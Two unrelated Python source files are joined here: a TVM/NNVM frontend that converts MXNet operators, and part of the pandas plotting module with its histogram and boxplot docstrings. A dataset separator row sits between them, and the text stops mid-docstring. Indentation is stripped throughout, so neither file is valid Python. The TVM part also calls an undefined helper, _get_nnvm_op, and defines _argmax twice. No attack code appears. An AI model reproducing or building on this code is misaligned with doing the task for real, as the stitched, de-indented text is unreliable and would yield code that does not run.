# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, import-self
"""MXNet symbol frontend."""
from __future__ import absolute_import as _abs
import json
import tvm
from .. import symbol as _sym
from .common import get_nnvm_op, required_attr, parse_tshape, parse_bool_str
__all__ = ['from_mxnet']
def _rename(new_name):
def impl(inputs, attrs):
return get_nnvm_op(new_name)(*inputs, **attrs)
return impl
def _pooling(inputs, attrs):
kernel = parse_tshape(required_attr(attrs, 'kernel', 'pooling'))
if len(kernel) != 2:
raise tvm.error.OpAttributeUnImplemented(
'Non-2D kernels are not supported for Pool2D.')
global_pool = 'global' if parse_bool_str(attrs, 'global_pool') else ''
pool_type = required_attr(attrs, 'pool_type', 'pooling')
if pool_type not in ['avg', 'max']:
raise tvm.error.OpNotImplemented(
'Only max and average pooling are supported in frontend MXNet.')
op_name, new_attrs = '_'.join([global_pool, pool_type, 'pool2d']).strip('_'), {}
# new_attrs['layout'] = 'NCHW'
if not global_pool:
new_attrs['pool_size'] = kernel
new_attrs['strides'] = attrs.get('stride', (1, 1))
new_attrs['padding'] = attrs.get('pad', (0, 0))
new_attrs['ceil_mode'] = (attrs.get('pooling_convention', 'valid') == 'full')
if pool_type == 'avg':
new_attrs['count_include_pad'] = attrs.get('count_include_pad', True)
return get_nnvm_op(op_name)(*inputs, **new_attrs)
def _batch_norm(inputs, attrs):
if parse_bool_str(attrs, 'output_mean_var'):
raise tvm.error.OpAttributeUnImplemented(
'Attribute "output_mean_var" is not supported in operator batch_norm.')
# if parse_bool_str(attrs, 'fix_gamma'):
# _warn_not_used('fix_gamma', 'batch_norm')
if parse_bool_str(attrs, 'use_global_stats'):
from warnings import warn
warn(
'Attribute "use_global_stats" is ignored in operator batch_norm.')
# if parse_bool_str(attrs, 'momentum'):
# _warn_not_used('momentum', 'batch_norm')
op_name, new_attrs = 'batch_norm', {}
new_attrs['axis'] = attrs.get('axis', 1)
new_attrs['epsilon'] = attrs.get('eps', 0.001)
new_attrs['center'] = True
new_attrs['scale'] = not parse_bool_str(attrs, 'fix_gamma', default="False")
return get_nnvm_op(op_name)(*inputs, **new_attrs)
def _concat(inputs, attrs):
op_name = 'concatenate'
new_attrs = {'axis': attrs.get('dim', 1)}
return get_nnvm_op(op_name)(*inputs, **new_attrs)
def _conv2d(inputs, attrs):
kernel = parse_tshape(required_attr(attrs, 'kernel', 'conv2d'))
if len(kernel) != 2:
raise tvm.error.OpAttributeUnimplemented(
'Non-2D kernels are not supported for operator Conv2D.')
layout = attrs.get('layout', 'NCHW')
if layout not in ['NCHW', 'NHWC']:
raise tvm.error.OpAttributeUnimplemented(
'Layout {} is not supported in operator Conv2D.'.format(layout))
if 'kernel_layout' in attrs:
kernel_layout = attrs['kernel_layout']
else:
kernel_layout = 'HWIO' if layout == 'NHWC' else 'OIHW'
op_name, new_attrs = 'conv2d', {}
new_attrs['channels'] = required_attr(attrs, 'num_filter', 'conv2d')
new_attrs['kernel_size'] = kernel
new_attrs['strides'] = attrs.get('stride', (1, 1))
new_attrs['padding'] = attrs.get('pad', (0, 0))
new_attrs['dilation'] = attrs.get('dilate', (1, 1))
new_attrs['groups'] = attrs.get('num_group', 1)
new_attrs['layout'] = layout
new_attrs['kernel_layout'] = kernel_layout
new_attrs['use_bias'] = attrs.get('no_bias', 'False').strip() == 'False'
return get_nnvm_op(op_name)(*inputs, **new_attrs)
def _conv2d_transpose(inputs, attrs):
if 'target_shape' in attrs:
raise tvm.error.OpAttributeUnimplemented(
'Attribute "target_shape" is not supported in operator Conv2D-transpose.')
kernel = parse_tshape(required_attr(attrs, 'kernel', 'conv2d_transpose'))
if len(kernel) != 2:
raise tvm.error.OpAttributeInvalid(
'Non-2D kernels are not supported in Conv2D-transpose.')
layout = attrs.get('layout', 'NCHW')
if layout not in ['NCHW', 'NHWC']:
raise tvm.error.OpAttributeUnimplemented(
'Layout {} is not supported in operator Conv2D-transpose.')
if 'kernel_layout' in attrs:
kernel_layout = attrs['kernel_layout']
else:
kernel_layout = 'HWIO' if layout == 'NHWC' else 'OIHW'
op_name, new_attrs = 'conv2d_transpose', {}
new_attrs['channels'] = required_attr(attrs, 'num_filter', 'conv2d_transpose')
new_attrs['kernel_size'] = kernel
new_attrs['strides'] = attrs.get('stride', (1, 1))
new_attrs['output_padding'] = attrs.get('adj', (0, 0))
new_attrs['padding'] = attrs.get('pad', (0, 0))
new_attrs['dilation'] = attrs.get('dilate', (1, 1))
new_attrs['groups'] = attrs.get('num_group', 1)
new_attrs['layout'] = layout
new_attrs['kernel_layout'] = kernel_layout
new_attrs['use_bias'] = not parse_bool_str(attrs, 'no_bias')
return get_nnvm_op(op_name)(*inputs, **new_attrs)
def _dense(inputs, attrs):
import mxnet as mx
op_name, new_attrs = 'dense', {}
new_attrs['units'] = required_attr(attrs, 'num_hidden', 'dense')
new_attrs['use_bias'] = not parse_bool_str(attrs, 'no_bias')
try:
_ = mx.sym.FullyConnected(mx.sym.var('x'), num_hidden=1, flatten=True)
has_flatten = True
except mx.base.MXNetError:
# no flatten attribute in old mxnet
has_flatten = False
use_flatten = parse_bool_str(attrs, 'flatten', 'True')
if has_flatten and use_flatten:
inputs[0] = _sym.flatten(inputs[0])
return get_nnvm_op(op_name)(*inputs, **new_attrs)
def _dropout(inputs, attrs):
op_name, new_attrs = 'dropout', {}
new_attrs['rate'] = attrs.get('p', 0.5)
return get_nnvm_op(op_name)(*inputs, **new_attrs)
def _leaky_relu(inputs, attrs):
act_type = required_attr(attrs, 'act_type', 'leaky_relu')
if act_type in ['leaky', 'prelu']:
op_name, new_attrs = act_type, {}
if act_type == 'leaky':
new_attrs['alpha'] = attrs.get('slope', 0.25)
sym = get_nnvm_op(op_name)(*inputs, **new_attrs)
elif act_type == 'elu':
slope = attrs.get('slope', 0.25)
sym = -slope * _sym.relu(1 - _sym.exp(*inputs)) + _sym.relu(*inputs)
elif act_type == 'rrelu':
lower_bound = float(required_attr(attrs, 'lower_bound', 'leaky_relu'))
upper_bound = float(required_attr(attrs, 'upper_bound', 'leaky_relu'))
slope = (lower_bound + upper_bound) / 2.0
op_name, new_attrs = 'leaky_relu', {'alpha': str(slope)}
sym = get_nnvm_op(op_name)(*inputs, **new_attrs)
else:
raise tvm.error.OpNotImplemented(
'Operator {} is not supported in frontend MXNet.'.format(act_type))
return sym
def _activations(inputs, attrs):
act_type = required_attr(attrs, 'act_type', 'activations')
if act_type in ['relu', 'sigmoid', 'tanh']:
op_name, new_attrs = act_type, {}
sym = get_nnvm_op(op_name)(*inputs, **new_attrs)
elif act_type == 'softrelu':
sym = _sym.log((1 + _sym.exp(*inputs)))
else:
raise tvm.error.OpNotImplemented(
'Operator {} is not supported in frontend MXNet.'.format(act_type))
return sym
def _reshape(inputs, attrs):
if parse_bool_str(attrs, 'reverse'):
raise tvm.error.OpAttributeUnimplemented(
'Attribute "reverse" is not supported in operator Reshape.')
op_name, new_attrs = 'reshape', {}
new_attrs['shape'] = required_attr(attrs, 'shape', 'reshape')
return get_nnvm_op(op_name)(*inputs, **new_attrs)
def _slice(inputs, attrs):
begin = attrs.get('begin', None)
end = attrs.get('end', None)
stride = attrs.get('step', None)
if begin is None or end is None:
raise RuntimeError('begin and end are required params')
if 'None' in begin or 'None' in end:
raise RuntimeError('None in begin or end not supported yet...')
new_attrs = {'begin': begin, 'end': end}
if stride is not None:
new_attrs['stride'] = stride
return get_nnvm_op('strided_slice')(inputs[0], **new_attrs)
def _split(inputs, attrs):
op_name, new_attrs = 'split', {}
axis = attrs.get('axis', 1)
new_attrs['indices_or_sections'] = required_attr(attrs, 'num_outputs', 'split')
new_attrs['axis'] = axis
outputs = get_nnvm_op(op_name)(*inputs, **new_attrs)
if parse_bool_str(attrs, 'squeeze_axis'):
squeeze_attrs = {'axis': axis}
outputs = _sym.Group([get_nnvm_op('squeeze')(o, **squeeze_attrs) for o in outputs])
return outputs
def _softmax_activation(inputs, attrs):
op_name, new_attrs = 'softmax', {}
mode = attrs.get('mode', 'instance')
new_attrs['axis'] = 0 if mode == 'instance' else 1
return get_nnvm_op(op_name)(inputs[0], **new_attrs)
def _softmax_output(inputs, attrs):
op_name, new_attrs = 'softmax', {}
if parse_bool_str(attrs, 'multi_output'):
new_attrs['axis'] = 1
return get_nnvm_op(op_name)(inputs[0], **new_attrs)
def _upsampling(inputs, attrs):
scale = attrs.get('scale')
new_attrs = {'scale':int(scale)}
return get_nnvm_op('upsampling')(inputs[0], **new_attrs)
def _clip(inputs, attrs):
op_name, new_attrs = "clip", {}
new_attrs['a_min'] = required_attr(attrs, 'a_min', 'clip')
new_attrs['a_max'] = required_attr(attrs, 'a_max', 'clip')
return get_nnvm_op(op_name)(*inputs, **new_attrs)
def _contrib_multibox_detection(inputs, attrs):
clip = parse_bool_str(attrs, 'clip', default='True')
threshold = attrs.get('threshold') or 0.01
nms_threshold = attrs.get('nms_threshold') or 0.5
force_suppress = parse_bool_str(attrs, 'force_suppress', default='False')
variances = tuple([float(x.strip()) for x in attrs.get('variances').strip('()').split(',')]) \
if attrs.get('variances') is not None else (0.1, 0.1, 0.2, 0.2)
nms_topk = attrs.get('nms_topk') or -1
new_attrs0 = {'clip': clip, 'threshold': float(threshold), 'variances': variances}
new_attrs1 = {'return_indices': False, 'iou_threshold': float(nms_threshold),
'force_suppress': force_suppress, 'top_k': int(nms_topk)}
data, valid_count = get_nnvm_op('multibox_transform_loc')(inputs[0], inputs[1],
inputs[2], **new_attrs0)
return get_nnvm_op('non_max_suppression')(data, valid_count, **new_attrs1)
def _elemwise_sum(inputs, _):
new_attrs = {'num_args':len(inputs)}
return get_nnvm_op('elemwise_sum')(*inputs, **new_attrs)
def _crop_like(inputs, attrs):
new_attrs = {}
offsets = \
tuple([float(x.strip()) for x in attrs.get('offsets').strip('()').split(',')]) \
if attrs.get('offsets') is not None else (0, 0)
if offsets != (0, 0):
raise tvm.error.OpAttributeInvalid(
'crop_like offsets must equal (0,0).')
center_crop = parse_bool_str(attrs, 'center_crop', default="False")
if center_crop:
raise tvm.error.OpAttributeUnimplemented(
'Center crop is not supported in operator crop_like.')
if len(inputs) < 2:
raise tvm.error.OpAttributeUnimplemented("Only support crop_like pattern.")
new_attrs["axis"] = [2, 3]
return get_nnvm_op('slice_like')(inputs[0], inputs[1], **new_attrs)
def _expand_dims(inputs, attrs):
op_name, new_attrs = 'expand_dims', {}
new_attrs['axis'] = required_attr(attrs, 'axis', 'expand_dims')
return get_nnvm_op(op_name)(*inputs, **new_attrs)
def _lrn(inputs, attrs):
op_name, new_attrs = 'lrn', {}
new_attrs['alpha'] = attrs.get('alpha', 0.0001)
new_attrs['beta'] = attrs.get('beta', 0.75)
new_attrs['bias'] = attrs.get('knorm', 2)
# NCHW format and normalization along channel axis
new_attrs['axis'] = 1
new_attrs['size'] = required_attr(attrs, 'nsize', 'lrn')
return get_nnvm_op(op_name)(*inputs, **new_attrs)
def _symbol_ring_buffer(inputs, attrs):
output = _get_nnvm_op('ring_buffer')(*inputs, **attrs)
return _sym._assign(inputs[1], output)
def _copy(inputs, _):
return _get_nnvm_op('copy')(inputs[0], **{})
def _argmax(inputs, attrs):
return _get_nnvm_op('argmax')(*inputs, **attrs)
def _minimum(inputs, attrs):
return get_nnvm_op('broadcast_min')(*inputs, **attrs)
def _maximum(inputs, attrs):
return get_nnvm_op('broadcast_max')(*inputs, **attrs)
def _ones(_, attrs):
op_name = 'ones'
return get_nnvm_op(op_name)(**attrs)
def _zeros(_, attrs):
op_name = 'zeros'
return get_nnvm_op(op_name)(**attrs)
def _argmax(inputs, attrs):
op_name, new_attrs = 'argmax', {}
new_attrs['dtype'] = 'float32'
new_attrs['axis'] = attrs.get('axis', 0)
new_attrs['keepdims'] = parse_bool_str(attrs, 'keepdims', default="False")
return get_nnvm_op(op_name)(*inputs, **new_attrs)
def _argmin(inputs, attrs):
op_name, new_attrs = 'argmin', {}
new_attrs['dtype'] = 'float32'
new_attrs['axis'] = attrs.get('axis', 0)
new_attrs['keepdims'] = parse_bool_str(attrs, 'keepdims', default="False")
return get_nnvm_op(op_name)(*inputs, **new_attrs)
_identity_list = ['__add_scalar__', '__add_symbol__', '__div_scalar__',
'__div_symbol__', '__mul_scalar__', '__mul_symbol__',
'__pow_scalar__', '__rdiv_scalar__', '__rpow_scalar__',
'__rsub_scalar__', '__sub_scalar__', '__sub_symbol__',
'broadcast_add', 'broadcast_div', 'broadcast_mul',
'broadcast_sub', 'broadcast_to', 'cast', 'elemwise_add',
'elemwise_div', 'elemwise_mul', 'elemwise_sub', 'exp',
'flatten', 'log', 'log_softmax', 'max', 'min', 'negative',
'ones_like', 'relu', 'sigmoid', 'slice_like', 'softmax',
'sum', 'tanh', 'transpose', 'zeros_like', 'gather_nd',
'reshape_like', 'where']
_convert_map = {
'_copy' : _rename('copy'),
'_div_scalar' : _rename('__div_scalar__'),
'_minus_scalar' : _rename('__sub_scalar__'),
'_mul_scalar' : _rename('__mul_scalar__'),
'_plus_scalar' : _rename('__add_scalar__'),
'_rdiv_scalar' : _rename('__rdiv_scalar__'),
'_rminus_scalar': _rename('__rsub_scalar__'),
'_contrib_MultiBoxPrior' : _rename('multibox_prior'),
'_contrib_MultiBoxDetection' : _contrib_multibox_detection,
'_minimum' : _minimum,
'_maximum' : _maximum,
'_ones' : _ones,
'_zeros' : _zeros,
'argmax' : _argmax,
'argmin' : _argmin,
'Activation' : _activations,
'BatchNorm' : _batch_norm,
'BatchNorm_v1' : _batch_norm,
'Cast' : _rename('cast'),
'Concat' : _concat,
'Convolution' : _conv2d,
'Convolution_v1': _conv2d,
'Crop' : _crop_like,
'Deconvolution' : _conv2d_transpose,
'Dropout' : _dropout,
'Flatten' : _rename('flatten'),
'FullyConnected': _dense,
'LeakyReLU' : _leaky_relu,
'Pooling' : _pooling,
'Pooling_v1' : _pooling,
'Reshape' : _reshape,
'slice' : _slice,
'SliceChannel' : _split,
'split' : _split,
'Softmax' : _rename('softmax'),
'SoftmaxActivation' : _softmax_activation,
'SoftmaxOutput' : _softmax_output,
'add_n' : _elemwise_sum,
'concat' : _concat,
'max_axis' : _rename('max'),
'min_axis' : _rename('min'),
'reshape' : _reshape,
'sum_axis' : _rename('sum'),
'UpSampling' : _upsampling,
'clip' : _clip,
'expand_dims' : _expand_dims,
'LRN' : _lrn,
'ring_buffer' : _symbol_ring_buffer,
'LinearRegressionOutput' : _copy
}
def _convert_symbol(op_name, inputs, attrs,
identity_list=None,
convert_map=None):
"""Convert from mxnet op to nnvm op.
The converter must specify some conversions explicitly to
support gluon format ops such as conv2d...
Parameters
----------
op_name : str
Operator name, such as Convolution, FullyConnected
inputs : list of nnvm.Symbol
List of input symbols.
attrs : dict
Dict of operator attributes
identity_list : list
List of operators that don't require conversion
convert_map : dict
Dict of name : callable, where name is the op's name that
require conversion to nnvm, callable are functions which
take attrs and return (new_op_name, new_attrs)
Returns
-------
sym : nnvm.Symbol
Converted nnvm Symbol
"""
identity_list = identity_list if identity_list else _identity_list
convert_map = convert_map if convert_map else _convert_map
if op_name in identity_list:
op = get_nnvm_op(op_name)
sym = op(*inputs, **attrs)
elif op_name in convert_map:
sym = convert_map[op_name](inputs, attrs)
else:
raise tvm.error.OpNotImplemented(
'Operator {} is not supported in frontend MXNet.'.format(op_name))
return sym
def _as_list(arr):
"""Force being a list, ignore if already is."""
if isinstance(arr, list):
return arr
return [arr]
def _topo_sort(symbol):
"""Sort all symbols in the mxnet graph in topological order.
Parameters
----------
symbol : mxnet.sym.Symbol
Returns:
-------
list
List of mxnet symbol
"""
queue = []
symbol_map = {}
deps = {}
dep_cnts = {}
for s in symbol:
symbol_map[s.attr('name')] = s
queue.append(s)
while queue:
sym = queue.pop(0)
name = sym.attr('name')
childs = sym.get_children()
if childs is None:
dep_cnts[name] = 0
else:
dep_cnts[name] = len({c.attr('name') for c in childs})
for child in childs:
child_name = child.attr('name')
if child_name not in deps:
deps[child_name] = set()
deps[child_name].add(name)
if child_name not in symbol_map:
symbol_map[child_name] = child
queue.append(child)
order = []
while dep_cnts:
remove = []
for name in dep_cnts:
if dep_cnts[name] == 0:
order.append(symbol_map[name])
remove.append(name)
if name in deps:
for other in deps[name]:
dep_cnts[other] -= 1
for name in remove:
del dep_cnts[name]
return order
def _from_mxnet_impl(symbol, graph):
"""Convert mxnet symbol to nnvm implementation.
Reconstruct a nnvm symbol by traversing the mxnet symbol.
Parameters
----------
symbol : mxnet.sym.Symbol
Incompatible symbol from mxnet, sharing similar graph structure.
The op_name and attrs inside are not always compatible.
graph : dict
Reusable nodes are stored in graph.
Returns:
-------
nnvm.sym.Symbol
Converted symbol
"""
def get_node(sym):
name = sym.attr('name')
if name not in graph:
return None
output_index = json.loads(sym.tojson())['heads'][0][1]
return graph[name][output_index]
assert symbol is not None
# Traverse all symbols in topological order
for sym in _topo_sort(symbol):
name = sym.attr('name')
attr = sym.list_attr()
op_name = sym.attr('op_name')
childs = sym.get_children()
if childs is not None:
childs = [get_node(child) for child in childs]
childs = [x for y in childs for x in _as_list(y)]
node = _convert_symbol(op_name, childs, attr)
elif op_name != 'null':
node = _convert_symbol(op_name, [], attr)
else:
node = _sym.Variable(name=name, **attr)
graph[name] = node
nodes = []
for sym in symbol:
node = get_node(sym)
assert node is not None
nodes.append(node)
if len(nodes) > 1:
return _sym.Group(nodes)
return nodes[0]
def from_mxnet(symbol, arg_params=None, aux_params=None):
"""Convert from MXNet's model into compatible NNVM format.
Parameters
----------
symbol : mxnet.Symbol or mxnet.gluon.HybridBlock
MXNet symbol
arg_params : dict of str to mx.NDArray
The argument parameters in mxnet
aux_params : dict of str to mx.NDArray
The auxiliary parameters in mxnet
Returns
-------
sym : nnvm.Symbol
Compatible nnvm symbol
params : dict of str to tvm.NDArray
The parameter dict to be used by nnvm
"""
try:
import mxnet as mx
except ImportError as e:
raise ImportError('{}. MXNet is required to parse symbols.'.format(e))
if isinstance(symbol, mx.sym.Symbol):
sym = _from_mxnet_impl(symbol, {})
params = {}
arg_params = arg_params if arg_params else {}
aux_params = aux_params if aux_params else {}
for k, v in arg_params.items():
params[k] = tvm.nd.array(v.asnumpy())
for k, v in aux_params.items():
params[k] = tvm.nd.array(v.asnumpy())
elif isinstance(symbol, mx.gluon.HybridBlock):
data = mx.sym.Variable('data')
sym = symbol(data)
sym = _from_mxnet_impl(sym, {})
params = {}
for k, v in symbol.collect_params().items():
params[k] = tvm.nd.array(v.data().asnumpy())
elif isinstance(symbol, mx.gluon.Block):
raise NotImplementedError("Only Hybrid Blocks are supported now.")
else:
msg = "mxnet.Symbol or gluon.HybridBlock expected, got {}".format(type(symbol))
raise ValueError(msg)
if isinstance(sym, list):
sym = _sym.Group(sym)
return sym, params
|
py
|
1a5efee586ee12d02383eaee009eed98ffa6f5b2
|
from __future__ import annotations
import importlib
from typing import (
TYPE_CHECKING,
Optional,
Sequence,
Tuple,
Union,
)
from pandas._config import get_option
from pandas._typing import IndexLabel
from pandas.util._decorators import (
Appender,
Substitution,
)
from pandas.core.dtypes.common import (
is_integer,
is_list_like,
)
from pandas.core.dtypes.generic import (
ABCDataFrame,
ABCSeries,
)
from pandas.core.base import PandasObject
if TYPE_CHECKING:
from pandas import DataFrame
def hist_series(
self,
by=None,
ax=None,
grid: bool = True,
xlabelsize: Optional[int] = None,
xrot: Optional[float] = None,
ylabelsize: Optional[int] = None,
yrot: Optional[float] = None,
figsize: Optional[Tuple[int, int]] = None,
bins: Union[int, Sequence[int]] = 10,
backend: Optional[str] = None,
legend: bool = False,
**kwargs,
):
"""
Draw histogram of the input series using matplotlib.
Parameters
----------
by : object, optional
If passed, then used to form histograms for separate groups.
ax : matplotlib axis object
If not passed, uses gca().
grid : bool, default True
Whether to show axis grid lines.
xlabelsize : int, default None
If specified changes the x-axis label size.
xrot : float, default None
Rotation of x axis labels.
ylabelsize : int, default None
If specified changes the y-axis label size.
yrot : float, default None
Rotation of y axis labels.
figsize : tuple, default None
Figure size in inches by default.
bins : int or sequence, default 10
Number of histogram bins to be used. If an integer is given, bins + 1
bin edges are calculated and returned. If bins is a sequence, gives
bin edges, including left edge of first bin and right edge of last
bin. In this case, bins is returned unmodified.
backend : str, default None
Backend to use instead of the backend specified in the option
``plotting.backend``. For instance, 'matplotlib'. Alternatively, to
specify the ``plotting.backend`` for the whole session, set
``pd.options.plotting.backend``.
.. versionadded:: 1.0.0
legend : bool, default False
Whether to show the legend.
.. versionadded:: 1.1.0
**kwargs
To be passed to the actual plotting function.
Returns
-------
matplotlib.AxesSubplot
A histogram plot.
See Also
--------
matplotlib.axes.Axes.hist : Plot a histogram using matplotlib.
"""
plot_backend = _get_plot_backend(backend)
return plot_backend.hist_series(
self,
by=by,
ax=ax,
grid=grid,
xlabelsize=xlabelsize,
xrot=xrot,
ylabelsize=ylabelsize,
yrot=yrot,
figsize=figsize,
bins=bins,
legend=legend,
**kwargs,
)
def hist_frame(
data: DataFrame,
column: IndexLabel = None,
by=None,
grid: bool = True,
xlabelsize: Optional[int] = None,
xrot: Optional[float] = None,
ylabelsize: Optional[int] = None,
yrot: Optional[float] = None,
ax=None,
sharex: bool = False,
sharey: bool = False,
figsize: Optional[Tuple[int, int]] = None,
layout: Optional[Tuple[int, int]] = None,
bins: Union[int, Sequence[int]] = 10,
backend: Optional[str] = None,
legend: bool = False,
**kwargs,
):
"""
Make a histogram of the DataFrame's.
A `histogram`_ is a representation of the distribution of data.
This function calls :meth:`matplotlib.pyplot.hist`, on each series in
the DataFrame, resulting in one histogram per column.
.. _histogram: https://en.wikipedia.org/wiki/Histogram
Parameters
----------
data : DataFrame
The pandas object holding the data.
column : str or sequence
If passed, will be used to limit data to a subset of columns.
by : object, optional
If passed, then used to form histograms for separate groups.
grid : bool, default True
Whether to show axis grid lines.
xlabelsize : int, default None
If specified changes the x-axis label size.
xrot : float, default None
Rotation of x axis labels. For example, a value of 90 displays the
x labels rotated 90 degrees clockwise.
ylabelsize : int, default None
If specified changes the y-axis label size.
yrot : float, default None
Rotation of y axis labels. For example, a value of 90 displays the
y labels rotated 90 degrees clockwise.
ax : Matplotlib axes object, default None
The axes to plot the histogram on.
sharex : bool, default True if ax is None else False
In case subplots=True, share x axis and set some x axis labels to
invisible; defaults to True if ax is None otherwise False if an ax
is passed in.
Note that passing in both an ax and sharex=True will alter all x axis
labels for all subplots in a figure.
sharey : bool, default False
In case subplots=True, share y axis and set some y axis labels to
invisible.
figsize : tuple
The size in inches of the figure to create. Uses the value in
`matplotlib.rcParams` by default.
layout : tuple, optional
Tuple of (rows, columns) for the layout of the histograms.
bins : int or sequence, default 10
Number of histogram bins to be used. If an integer is given, bins + 1
bin edges are calculated and returned. If bins is a sequence, gives
bin edges, including left edge of first bin and right edge of last
bin. In this case, bins is returned unmodified.
backend : str, default None
Backend to use instead of the backend specified in the option
``plotting.backend``. For instance, 'matplotlib'. Alternatively, to
specify the ``plotting.backend`` for the whole session, set
``pd.options.plotting.backend``.
.. versionadded:: 1.0.0
legend : bool, default False
Whether to show the legend.
.. versionadded:: 1.1.0
**kwargs
All other plotting keyword arguments to be passed to
:meth:`matplotlib.pyplot.hist`.
Returns
-------
matplotlib.AxesSubplot or numpy.ndarray of them
See Also
--------
matplotlib.pyplot.hist : Plot a histogram using matplotlib.
Examples
--------
This example draws a histogram based on the length and width of
some animals, displayed in three bins
.. plot::
:context: close-figs
>>> df = pd.DataFrame({
... 'length': [1.5, 0.5, 1.2, 0.9, 3],
... 'width': [0.7, 0.2, 0.15, 0.2, 1.1]
... }, index=['pig', 'rabbit', 'duck', 'chicken', 'horse'])
>>> hist = df.hist(bins=3)
"""
plot_backend = _get_plot_backend(backend)
return plot_backend.hist_frame(
data,
column=column,
by=by,
grid=grid,
xlabelsize=xlabelsize,
xrot=xrot,
ylabelsize=ylabelsize,
yrot=yrot,
ax=ax,
sharex=sharex,
sharey=sharey,
figsize=figsize,
layout=layout,
legend=legend,
bins=bins,
**kwargs,
)
_boxplot_doc = """
Make a box plot from DataFrame columns.
Make a box-and-whisker plot from DataFrame columns, optionally grouped
by some other columns. A box plot is a method for graphically depicting
groups of numerical data through their quartiles.
The box extends from the Q1 to Q3 quartile values of the data,
with a line at the median (Q2). The whiskers extend from the edges
of box to show the range of the data. By default, they extend no more than
`1.5 * IQR (IQR = Q3 - Q1)` from the edges of the box, ending at the farthest
data point within that interval. Outliers are plotted as separate dots.
For further details see
Wikipedia's entry for `boxplot <https://en.wikipedia.org/wiki/Box_plot>`_.
Parameters
----------
column : str or list of str, optional
Column name or list of names, or vector.
Can be any valid input to :meth:`pandas.DataFrame.groupby`.
by : str or array-like, optional
Column in the DataFrame to :meth:`pandas.DataFrame.groupby`.
One box-plot will be done per value of columns in `by`.
ax : object of class matplotlib.axes.Axes, optional
The matplotlib axes to be used by boxplot.
fontsize : float or str
Tick label font size in points or as a string (e.g., `large`).
rot : int or float, default 0
The rotation angle of labels (in degrees)
with respect to the screen coordinate system.
grid : bool, default True
Setting this to True will show the grid.
figsize : A tuple (width, height) in inches
The size of the figure to create in matplotlib.
layout : tuple (rows, columns), optional
For example, (3, 5) will display the subplots
using 3 columns and 5 rows, starting from the top-left.
return_type : {'axes', 'dict', 'both'} or None, default 'axes'
The kind of object to return. The default is ``axes``.
* 'axes' returns the matplotlib axes the boxplot is drawn on.
* 'dict' returns a dictionary whose values are the matplotlib
Lines of the boxplot.
* 'both' returns a namedtuple with the axes and dict.
* when grouping with ``by``, a Series mapping columns to
``return_type`` is returned.
If ``return_type`` is `None`, a NumPy array
of axes with the same shape as ``layout`` is returned.
%(backend)s\
**kwargs
All other plotting keyword arguments to be passed to
:func:`matplotlib.pyplot.boxplot`.
Returns
-------
result
See Notes.
See Also
--------
Series.plot.hist: Make a histogram.
matplotlib.pyplot.boxplot : Matplotlib equivalent plot.
Notes
-----
The return type depends on the `return_type` parameter:
* 'axes' : object of class matplotlib.axes.Axes
* 'dict' : dict of matplotlib.lines.Line2D objects
* 'both' : a namedtuple with structure (ax, lines)
For data grouped with ``by``, return a Series of the above or a numpy
array:
* :class:`~pandas.Series`
* :class:`~numpy.array` (for ``return_type = None``)
Use ``return_type='dict'`` when you want to tweak the appearance
of the lines after plotting. In this case a dict containing the Lines
making up the boxes, caps, fliers, medians, and whiskers is returned.
Examples
--------
Boxplots can be created for every column in the dataframe
by ``df.boxplot()`` or indicating the columns to be used:
.. plot::
:context: close-figs
>>> np.random.seed(1234)
>>> df = pd.DataFrame(np.random.randn(10, 4),
... columns=['Col1', 'Col2', 'Col3', 'Col4'])
>>> boxplot = df.boxplot(column=['Col1', 'Col2', 'Col3'])
Boxplots of variables distributions grouped by the values of a third
variable can be created using the option ``by``. For instance:
.. plot::
:context: close-figs
>>> df = pd.DataFrame(np.random.randn(10, 2),
... columns=['Col1', 'Col2'])
>>> df['X'] = pd.Series(['A', 'A', 'A', 'A', 'A',
... 'B', 'B', 'B', 'B', 'B'])
>>> boxplot = df.boxplot(by='X')
A list of strings (i.e. ``['X', 'Y']``) can be passed to boxplot
in order to group the data by combination of the variables in the x-axis:
.. plot::
:context: close-figs
>>> df = pd.DataFrame(np.random.randn(10, 3),
... columns=['Col1', 'Col2', 'Col3'])
>>> df['X'] = pd.Series(['A', 'A', 'A', 'A', 'A',
... 'B', 'B', 'B', 'B', 'B'])
>>> df['Y'] = pd.Series(['A', 'B', 'A', 'B', 'A',
... 'B', 'A', 'B', 'A', 'B'])
>>> boxplot = df.boxplot(column=['Col1', 'Col2'], by=['X', 'Y'])
The layout of boxplot can be adjusted giving a tuple to ``layout``:
.. plot::
:context: close-figs
>>> boxplot = df.boxplot(column=['Col1', 'Col2'], by='X',
... layout=(2, 1))
Additional formatting can be done to the boxplot, like suppressing the grid
(``grid=False``), rotating the labels in the x-axis (i.e. ``rot=45``)
or changing the fontsize (i.e. ``fontsize=15``):
.. plot::
:context: close-figs
>>> boxplot = df.boxplot(grid=False, rot=45, fontsize=15)
The parameter ``return_type`` can be used to select the type of element
returned by `boxplot`. When ``return_type='axes'`` is selected,
the matplotlib axes on which the boxplot is drawn are returned:
>>> boxplot = df.boxplot(column=['Col1', 'Col2'], return_type='axes')
>>> type(boxplot)
<class 'matplotlib.axes._subplots.AxesSubplot'>
When grouping with ``by``, a Series mapping columns to ``return_type``
is returned:
>>> boxplot = df.boxplot(column=['Col1', 'Col2'], by='X',
... return_type='axes')
>>> type(boxplot)
<class 'pandas.core.series.Series'>
If ``return_type`` is `None`, a NumPy array of axes with the same shape
as ``layout`` is returned:
>>> boxplot = df.boxplot(column=['Col1', 'Col2'], by='X',
... return_type=None)
>>> type(boxplot)
<class 'numpy.ndarray'>
"""
_backend_doc = """\
backend : str, default None
Backend to use instead of the backend specified in the option
``plotting.backend``. For instance, 'matplotlib'. Alternatively, to
specify the ``plotting.backend`` for the whole session, set
``pd.options.plotting.backend``.
.. versionadded:: 1.0.0
"""
_bar_or_line_doc = """
Parameters
----------
x : label or position, optional
Allows plotting of one column versus another. If not specified,
the index of the DataFrame is used.
y : label or position, optional
Allows plotting of one column versus another. If not specified,
all numerical columns are used.
color : str, array_like, or dict, optional
The color for each of the DataFrame's columns. Possible values are:
- A single color string referred to by name, RGB or RGBA code,
for instance 'red' or '#a98d19'.
- A sequence of color strings referred to by name, RGB or RGBA
code, which will be used for each column recursively. For
instance ['green','yellow'] each column's %(kind)s will be filled in
green or yellow, alternatively. If there is only a single column to
be plotted, then only the first color from the color list will be
used.
- A dict of the form {column name : color}, so that each column will be
colored accordingly. For example, if your columns are called `a` and
`b`, then passing {'a': 'green', 'b': 'red'} will color %(kind)ss for
